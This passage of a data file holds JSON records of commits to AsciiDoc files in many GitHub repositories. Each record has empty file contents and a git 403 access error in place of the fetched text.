folder.","repos":"bharavi\/jPOS,barspi\/jPOS,jpos\/jPOS,jpos\/jPOS,bharavi\/jPOS,jpos\/jPOS,bharavi\/jPOS,yinheli\/jPOS,barspi\/jPOS,alcarraz\/jPOS,alcarraz\/jPOS,barspi\/jPOS,yinheli\/jPOS,alcarraz\/jPOS,yinheli\/jPOS","old_file":"doc\/src\/asciidoc\/ch03\/dirpoll.adoc","new_file":"doc\/src\/asciidoc\/ch03\/dirpoll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"28da40c73b8628711c018cb946ece354712f914b","subject":"Python note: Generating a random base64 string","message":"Python note: Generating a random base64 string\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a9744279bd0b7c0b75bed50594d92903d8f6a8b8","subject":"symlinked README","message":"symlinked README\n","repos":"eworm-de\/yubikey-personalization-gui,eworm-de\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui,eworm-de\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eworm-de\/yubikey-personalization-gui.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"51d294f190b647bf308ac18389d1b191ab378ecc","subject":"Add README file","message":"Add README file\n","repos":"cytrinox\/cxxc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cytrinox\/cxxc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f4528b587632927a99224964e56a3822b4f1bb8","subject":"initial commit","message":"initial commit\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garyrussell\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39cea86dfa2d615854a05b146d08e329087dab03","subject":"Create README.adoc","message":"Create README.adoc","repos":"millross\/millross-vertx-servo,millross\/millross-vertx-servo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/millross\/millross-vertx-servo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ea73b05daa6b9d470e3f904fea8dcb6cf71ae8","subject":"Update readme","message":"Update readme\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12d94fe578a0186fcd579f3fc42c54cb7ea4644d","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84fb6e284981ee037c97ab54005bbe99c22ded4c","subject":"Add contributor covenant","message":"Add contributor covenant\n\nWe're big enough that we should have a contributor code of conduct. It's better to have this in place before something happens.\r\n\r\nThis is a direct lift from spring. We may want to adjust the reporting email address to be something riff specific down the road, but should be good enough for now.","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0828a4759ace30d29170c0d56050e4686809c7fc","subject":"Bitcoin Network configuration documentation","message":"Bitcoin Network configuration documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbdb44a69aeaecc17ab88a743d8271d21d032717","subject":"Publish 2016-11-14.adoc","message":"Publish 2016-11-14.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"2016-11-14.adoc","new_file":"2016-11-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc7d46add62ddf73cb8c90d74d390901cfc297a7","subject":"Update 2015-06-10-Web-Development-Learning.adoc","message":"Update 2015-06-10-Web-Development-Learning.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-10-Web-Development-Learning.adoc","new_file":"_posts\/2015-06-10-Web-Development-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b23b161114f65d73f361582834a1f786483f241b","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a62ff6ae19c8e27a2f37903248e941596560f6f","subject":"Delete the file at '_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc'","message":"Delete the file at '_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de7b2f2da5232f76b35ac63f1d74b104e333772","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07d8f4a10e3d2070a3e6ddd3c3d49e4f8fae89a0","subject":"Update 2015-01-31-RK.adoc","message":"Update 2015-01-31-RK.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-RK.adoc","new_file":"_posts\/2015-01-31-RK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719b204a621388b8e58c6c5b0e2159b9712fac37","subject":"initial README","message":"initial README\n","repos":"philandstuff\/fizzgig","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/philandstuff\/fizzgig.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12fdb06ee44d497f7438cbbde7a68805cc358f04","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e48b19264a088a07692559fd16ea54fea38256c7","subject":"Update 2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","message":"Update 2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","new_file":"_posts\/2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115a2c08d9cfd2729267e3dde8b05347fbb8c4cb","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d293a9898e8d70bc8551327d938c1aa16df1ed","subject":"Publish 2016-6-27-PHP.adoc","message":"Publish 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHP.adoc","new_file":"2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d00d03073ad48b5444c4099f94a29fc1c160594","subject":"changed bracing","message":"changed bracing\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23aee2343f2631045a0004e76c6d2d97a2c0bfee","subject":"Renamed batch_runtime_lifecycle","message":"Renamed batch_runtime_lifecycle\n","repos":"WASdev\/standards.jsr352.batch-spec,WASdev\/standards.jsr352.batch-spec","old_file":"specification\/job_runtime_lifecycle.adoc","new_file":"specification\/job_runtime_lifecycle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/WASdev\/standards.jsr352.batch-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84ba901da32cbbd2a7639b5d5c98953262be3713","subject":"Update 2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","message":"Update 2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_file":"_posts\/2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f87864a95fb7e44a24311a66ebc08ed0d67f0c07","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b977bd2a6df6ea23315752b4ab47c7f1efee2d9","subject":"Provide basic GraphQL query examples","message":"Provide basic GraphQL query examples\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"707f6d61ef8892b1c021550b547e339065febfef","subject":"Add missing annotation","message":"Add missing annotation\n","repos":"InfoSec812\/vertx-sql-common,InfoSec812\/vertx-sql-common,InfoSec812\/vertx-sql-common","old_file":"src\/main\/asciidoc\/enums.adoc","new_file":"src\/main\/asciidoc\/enums.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InfoSec812\/vertx-sql-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f17c53532367575769471343ef329712d4c798b3","subject":"Update 2018-02-05-.adoc","message":"Update 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4606e870a557d34a7952cf3bee25eb04ed70a162","subject":"Add docs\/README","message":"Add docs\/README\n","repos":"meisterluk\/screenshot-compare","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meisterluk\/screenshot-compare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db6a873b4053432b37fb1e45a75c147831ace33d","subject":"Update alerts standalone installation doc","message":"Update alerts standalone installation doc\n","repos":"hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b8ac555e25322ea0631962574ae365c330d0257","subject":"Delete README-zh.adoc","message":"Delete README-zh.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79f5da9a5f039ef80e43894aee7e31bea828d325","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"600dd6ba0d17762a4b35ed4c11838ee31d35f7af","subject":"Add changes file.","message":"Add changes file.\n","repos":"funcool\/buddy-core,funcool\/buddy-core","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/buddy-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de1ca603926a7516a7e90ed1a458cfb63ac2bb00","subject":"Update 2015-06-18-Teilen-ist-wichtig.adoc","message":"Update 2015-06-18-Teilen-ist-wichtig.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9ebd725b4dabfc05333e60dc5c99065019812f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb00d12b1492440d5c9084cdf65aba94e22e1df5","subject":"Update 2015-09-07-test.adoc","message":"Update 2015-09-07-test.adoc","repos":"simpleHoChun\/blog,simpleHoChun\/blog,simpleHoChun\/blog","old_file":"_posts\/2015-09-07-test.adoc","new_file":"_posts\/2015-09-07-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simpleHoChun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"490ca2d484d4395c9799a9f3c2f2d3e2f3a51240","subject":"Update 2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","message":"Update 2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","new_file":"_posts\/2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd3911f8c2fb1b67a71b89c07e54ce8e9cab9a3f","subject":"Update 2016-09-09-Babel.adoc","message":"Update 2016-09-09-Babel.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-09-09-Babel.adoc","new_file":"_posts\/2016-09-09-Babel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"779f5f768c90c07e08501c03ea9ca6e3f5eab388","subject":"corrected header level within qualitative-analysis","message":"corrected header level within qualitative-analysis\n","repos":"kitenco\/aim42,aim42\/aim42,feststelltaste\/aim42,aim42\/aim42,feststelltaste\/aim42,rschimmack\/aim42,kitenco\/aim42,rschimmack\/aim42","old_file":"src\/main\/asciidoc\/patterns\/analyze\/qualitative-analysis.adoc","new_file":"src\/main\/asciidoc\/patterns\/analyze\/qualitative-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b51d1095964cc7fb2458859e940f97e59c7610f","subject":"Update 2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","message":"Update 2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","repos":"mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog","old_file":"_posts\/2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","new_file":"_posts\/2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrtrombley\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea53b66bf43191fe7163896d01a44563721c5b80","subject":"Follows std","message":"Follows std\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19137eec00e23212cec98fe482cab5d4a29f146e","subject":"Add guiding philosophy document","message":"Add guiding philosophy document\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/guiding-philosophy.adoc","new_file":"docs\/guiding-philosophy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"737f119055ea1c8d37a32ae00f046a1c978c425d","subject":"y2b create post TDK 3 Speaker Boombox Unboxing \\u0026 Overview","message":"y2b create post TDK 3 Speaker Boombox Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-21-TDK-3-Speaker-Boombox-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-21-TDK-3-Speaker-Boombox-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23309590021434a395ce94d2967c78235097d662","subject":"add README.adoc to make github pretty","message":"add README.adoc to make github pretty\n","repos":"Yubico\/yubioath-android,Yubico\/yubioath-android,nmikhailov\/yubioath-android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubioath-android.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a61cda0bf4b34a619ee33b37986248804d631e4f","subject":"symlinked README","message":"symlinked README\n","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"90386344a3595e56852c0475b723e3477c7e6b86","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/spring-android-samples,spring-projects\/spring-android-samples,spring-projects\/spring-android-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-android-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d4e690378fc178e1a8ebd0feee2e16eb42968c5","subject":"add README","message":"add README\n","repos":"torstenwerner\/playgo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/torstenwerner\/playgo.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"fdf191fc8a8e32330713a42a297b21e34c7ca289","subject":"Update 2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","message":"Update 2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","new_file":"_posts\/2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32969e9962cb4e18cb7fa1a25d535f778e719bd5","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40f0f92caf76b47665aee57616b509ba4ec4ad67","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-perl-client,Yubico\/yubico-perl-client","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-perl-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea9a8b8c33f148e5a8b26222383cf190176c590f","subject":"readme: Add an explanation of the term `dotfiles`","message":"readme: Add an explanation of the term `dotfiles`\n\nWhile it is highly unlikely, that someone who does not know what\ndotfiles are stumbles upon this repository, I still want a basic\nexplanation for completeness sake.\n\nThe section is very basic and lacks detail, which I believe to be\nappropriate: this repository is about the dotfiles themselves and not\nthe meaning or history behind the 